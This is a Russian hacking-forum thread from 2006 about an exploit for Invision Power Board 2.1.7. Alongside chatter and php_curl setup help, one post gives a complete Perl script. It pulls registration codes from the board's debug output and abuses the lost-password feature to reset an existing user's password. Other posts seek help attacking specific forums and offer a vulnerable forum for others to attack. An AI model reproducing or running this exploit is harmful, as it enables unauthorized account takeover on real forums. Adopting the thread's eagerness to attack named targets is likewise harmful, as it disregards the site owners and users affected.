Форумы Вышел сплоит для Ipb 2.1.7

Discussion in 'Уязвимости CMS/форумов' started by gemaglabin, 1 Nov 2006.

Thread Status:
Not open for further replies.
  1. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    думаю сцена переживает некий переломный момент, либо в скором времени появиться команда которая с новой силой будет находить баги и выпускать интересные релизы, либо хак уйдет в полный андеграунд. ИМХО сейчас хак является попсовой вещью.

    Интересно посмотреть, что будет через год или более.
     
  2. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    Я не удивлюсь если скоро появится новый двиг форума и новая команда которая будет выкладывать баги к нему ;)
     
  3. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    HELP:
    Code:
    Это описание для тех, кто не знает, как сделать так чтобы заработал php_curl:
    
    1. Качаем http://limpompo.jino-net.ru/php_curl.rar
    2. Копируем libeay32.dll и ssleay32.dll в диру c:\windows\system32\
    3. Копируем  php_curl.dll в диру [you_apache_dir]\php\extensions 
    4. Редактируем PHP.ini - Удаляем Комент с extension=php_curl.dll
    5. Перезагрузи Апачу! 
    6. Уря =) Работает... ыыыыыы
    
    С Уважением limpompo.
    
     
    #23 limpompo, 4 Nov 2006
    Last edited: 4 Nov 2006
    1 person likes this.
  4. F.A.Q [R3x]

    F.A.Q [R3x] New Member

    Joined:
    26 Sep 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Плиз помогите ЛАМУ как вообще пользоватся Php скриптами? Дайте хоть ссылку на видео плиз или опишите как их использовать.

    З.Ы. буду очень признателен
     
  5. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    Вот прочитай:

    http://forum.antichat.ru/thread26510.html

    сплоиту нужен php_curl.dll, как его прикрутить к php смотри выше...
     
  6. F.A.Q [R3x]

    F.A.Q [R3x] New Member

    Joined:
    26 Sep 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    ок спс большое
     
  7. rowil

    rowil New Member

    Joined:
    6 Nov 2006
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    А почему когда запускаешь сплойт появляется пустое окно?
     
  8. KSURi

    KSURi tnega AOLPS

    Joined:
    6 Jun 2006
    Messages:
    458
    Likes Received:
    219
    Reputations:
    357
    На всяк пожарный выложу: (тока я его не тестил!!!)
    Code:
    #!perl -w
    
    use strict;
    use LWP::UserAgent;
    
    my $target="http://127.0.0.1/board/index.php";    # victim
    my $name="hax0r";                                 # existing user
    my $pass="31337";                                 # password to set
    my $proxy="";                                     # optional: http proxy
    
    my($prefix,$suffix,$regid,$regcode);
    my $ua=LWP::UserAgent->new();
    $ua->proxy("http",$proxy) if($proxy);
    my $response=$ua->get($target."?act=Reg&CODE=10");
    if($response->is_success)
    {
      if($response->content=~/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>(.+?)_reg_antispam<\/span> \(regid,regcode,ip_address,ctime\) VALUES\(\'(.{32}?)\',(.+?),/im)
      {
        $prefix=$1;
        $regid=$2;
        $regcode=$3;
      }
      else
      {
        $suffix="&debug=1";
        $response=$ua->get($target."?act=Reg&CODE=10".$suffix);
        if($response->is_success)
        {
          if($response->content=~/INSERT INTO (.+?)_reg_antispam \(regid,regcode,ip_address,ctime\) VALUES\(\'(.{32})\',(.+?),/im)
          {
            $prefix=$1;
            $regid=$2;
            $regcode=$3;
          }
          else { exit print "\nExploit failed!\n" }
        }
        else { exit print "\nExploit failed!\n" }
      }
    }
    else { exit print "\nExploit failed!\n" }
    $target=$target.$suffix if($suffix);
    $response=$ua->post($target,[act=>"Reg",
                                 CODE=>11,
                                 member_name=>$name,
                                 regid=>$regid,
                                 reg_code=>$regcode]);
    if($response->is_success)
    {
      if($response->content=~/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\) VALUES\(\'(.{32})\',(.{1,32}),/im)
      { changePass($regcode,$regid,$1,$2) }
      elsif($response->content=~/INSERT INTO '.$prefix.'_validating \(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\) VALUES\(\'(.{32})\',(.{1,32}),/im)
      { changePass($regcode,$regid,$1,$2) }
      else { exit print "\nExploit failed!\n" }
    }
    else { print "\nExploit failed!\n" }
    
    sub changePass
    {
      my($regcode,$regid,$vid,$userid)=@_;
      my $ua=LWP::UserAgent->new();
      $ua->proxy("http",$proxy) if($proxy);
      my $response=$ua->post($target,[act=>"Reg",
                                      CODE=>03,
                                      type=>"lostpass",
                                      uid=>$userid,
                                      aid=>$vid,
                                      regid=>$regid,
                                      reg_code=>$regcode,
                                      pass1=>$pass,
                                      pass2=>$pass]);
      if($response->is_success) { exit print "\nExploited!\n" }
      else { exit print "\nExploit failed!\n" }
    }
    
     
  9. -Bart-

    -Bart- New Member

    Joined:
    25 Apr 2006
    Messages:
    11
    Likes Received:
    3
    Reputations:
    1
    C:\Documents and Settings\Bart>C:\Downloads\ipb217.pl

    Exploit failed!
     
  10. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,119
    Reputations:
    1,139
    Ну failed - значит, failed, значит, форум патченный. Чеж ты хочешь то тогда :)
     
  11. balmer2

    balmer2 New Member

    Joined:
    28 Oct 2006
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Есть какой нить способ что бы ломать не лишь бы что,а интересуют пара конкретных форумов...чет через аваторки не прокатывает (или подскажите как заставить админа посмотреть) видимо с СИ плохо ((( а Xss не разбираюсь(((
     
  12. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,119
    Reputations:
    1,139
    а кто тебе мешает? разберись
     
  13. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    Блин, Лимпопо, наф ты удалил файло, чтоб модуль поставить? =( Дайте плз в ПМ этот архивец! =(
     
  14. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    Нечайно =)
     
  15. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    limpompo, можешь в ПМ кинуть архив, или ссылку плз? А то чувствую, так и не дождусь я от юзеров такого подарка Х_х Ибо срочно надо, форум падонка грохнуть. А из-за его отсталости я его уговорил врубить эту функцию :D
     
  16. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    Fr-Ron - нету у меня уже Архива... Так что придётся подождать у кого остался Архивчик
     
  17. MegaBits

    MegaBits Elder - Старейшина

    Joined:
    30 Aug 2006
    Messages:
    151
    Likes Received:
    24
    Reputations:
    10
    Вот выложил megabitshack.narod.ru/php_curl.rar
     
  18. KP0T

    KP0T New Member

    Joined:
    13 Mar 2005
    Messages:
    32
    Likes Received:
    1
    Reputations:
    0
    Пользы от этого сплойта только посмотреть как с cURL работать на PHP и всё, а найти уязвимый этому форум просто палево.
     
  19. Fr-Ron

    Fr-Ron Elder - Старейшина

    Joined:
    10 Sep 2006
    Messages:
    184
    Likes Received:
    72
    Reputations:
    13
    Kp0t
    Я знаю уязвимый форум, токо он на бесплатном хосте... Там админ му**к еще тот.
    Если хочешь душу на этом форуме отвести, в личку стукни ;)


    HiM@S:Closed хватить флудить,всё что надо для работы сплойта в теме описано .
     
    #39 Fr-Ron, 28 Nov 2006
    Last edited by a moderator: 29 Nov 2006
Thread Status:
Not open for further replies.